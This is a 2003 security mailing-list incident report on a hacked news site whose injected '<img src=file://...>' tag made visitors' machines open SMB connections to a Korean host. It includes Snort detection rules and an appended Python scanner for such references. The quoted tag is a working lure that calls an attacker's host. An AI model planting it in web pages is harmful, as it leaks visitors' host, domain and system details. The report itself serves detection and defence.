Security Incidents mailing list archives

Stopping information leakage


From: "Stark, Vernon L." <Vern.Stark () jhuapl edu>
Date: Tue, 13 May 2003 12:32:38 -0400

        I recently spotted several of our hosts attempting to contact a host
in Korea primarily on TCP ports 139 and 445.  We believe we've run this to
ground.  Our analysis suggests this is due to a news site that has probably
had their web page hacked.  The web page contains the following source code:

<img src=file://210.222.4.129/web.jpg>

Packets captured from one of our hosts indicate that almost immediately
after receiving this content, the host attempts to contact host
210.222.4.129 on port 445 and then on port 139.  Various hosts involved have
also used ports TCP 21 and UDP 137.  According to www.apnic.net,
210.222.4.129 is assigned to the Korea Network Information Center.  When I
e-mailed the owner of the web site, he promptly called me.  He indicated
that he had removed the content shown above and it later reappeared.

        This content at least gives the attacker the ability to see who
visits the web site.  Depending upon the web site with the hacked content,
this may provide the attacker with the ability to harvest a very useful
member list.  Moreover, if ports 139 and 445 are not blocked outbound,
additional information leakage can result since the Korean host (when last
tested) will gladly accept connections on port 139.  A host can report host
name, operating system, domain name, etc.  This emphasizes the importance of
having a policy that denies all traffic except that required.  Such a policy
will generally deny outbound traffic on ports 139 and 445 since this traffic
is generally only appropriate on the intranet.

        The following Snort rules have been used to track this particular
traffic:

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Content 210.222.4.129 spotted.  Korean port 139 host."; content:"210.222.4.129"; )

alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"Content 210.222.4.129 spotted.  Korean port 139 host."; content:"210.222.4.129"; )

alert tcp $HOME_NET any -> $EXTERNAL_NET 139 (msg:"Outgoing port 139 activity"; )

alert tcp $HOME_NET any -> $EXTERNAL_NET 445 (msg:"Outgoing port 445 activity"; )

Vern Stark, GCIA, GSEC
JHU/APL

Any opinions expressed are mine and may not reflect those of my employer.
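An added example, not part of Vern's post: a small Python checker that scans page content for the kind of reference described above (a `file://` URL or a UNC path in an attribute that a browser may fetch automatically) and reports whether the host it points at is outside the organisation. The sample HTML, the hypothetical internal suffix `.corp.example` and the 10.0.0.5 address are constructed for the demonstration; the 210.222.4.129 tag is the one quoted in the post.

```python
import re
import ipaddress
from html.parser import HTMLParser

# Constructed sample page: the injected tag quoted in the post, plus
# internal file references and ordinary links that should not be flagged
# as external.
SAMPLE_HTML = """
<html><body>
<h1>News</h1>
<img src=file://210.222.4.129/web.jpg>
<img src="/images/logo.gif">
<a href="file://fileserver.corp.example/share/doc.txt">doc</a>
<img src="\\\\10.0.0.5\\pub\\banner.png">
<link rel="stylesheet" href="https://cdn.example.net/site.css">
</body></html>
"""

# Attributes whose value the browser treats as a URL to load.
URL_ATTRS = {"src", "href", "data", "background", "action"}

# file://host/... and \\host\share\... both make Windows clients resolve
# the host (UDP 137) and open SMB (TCP 139/445) without user interaction
# when used in an auto-fetched element such as <img>.
FILE_SCHEME = re.compile(r"^file:/*([^/\\]+)", re.IGNORECASE)
UNC_PATH = re.compile(r"^\\\\([^\\]+)")


class RefCollector(HTMLParser):
    """Collects (tag, attribute, value) for every URL-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name.lower() in URL_ATTRS:
                self.refs.append((tag, name.lower(), value.strip()))


def remote_file_host(value):
    """Return the host a file:// or UNC reference points at, else None."""
    m = FILE_SCHEME.match(value) or UNC_PATH.match(value)
    return m.group(1) if m else None


def is_external(host, private_suffixes=(".corp.example",)):
    """True if the host is a globally routable IP or a non-internal name.

    private_suffixes is an assumed list of the organisation's own DNS
    suffixes; adjust to the real environment.
    """
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return not host.lower().endswith(private_suffixes)


def find_smb_lures(html, private_suffixes=(".corp.example",)):
    """Return every file:// or UNC reference in the page with its host and
    whether that host lies outside the organisation."""
    parser = RefCollector()
    parser.feed(html)
    findings = []
    for tag, attr, value in parser.refs:
        host = remote_file_host(value)
        if host is None:
            continue
        findings.append({
            "tag": tag,
            "attr": attr,
            "value": value,
            "host": host,
            "external": is_external(host, private_suffixes),
        })
    return findings


if __name__ == "__main__":
    for f in find_smb_lures(SAMPLE_HTML):
        flag = "EXTERNAL" if f["external"] else "internal"
        print(f"{flag:8} <{f['tag']} {f['attr']}=...> -> {f['host']}")
```

Run against a page fetched through the proxy (or against proxy cache contents), the `external` entries are the ones worth an alert; the post's Snort content rule catches only the one known address, whereas this check flags any `file://` or UNC reference that would drive an outbound 139/445 attempt.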
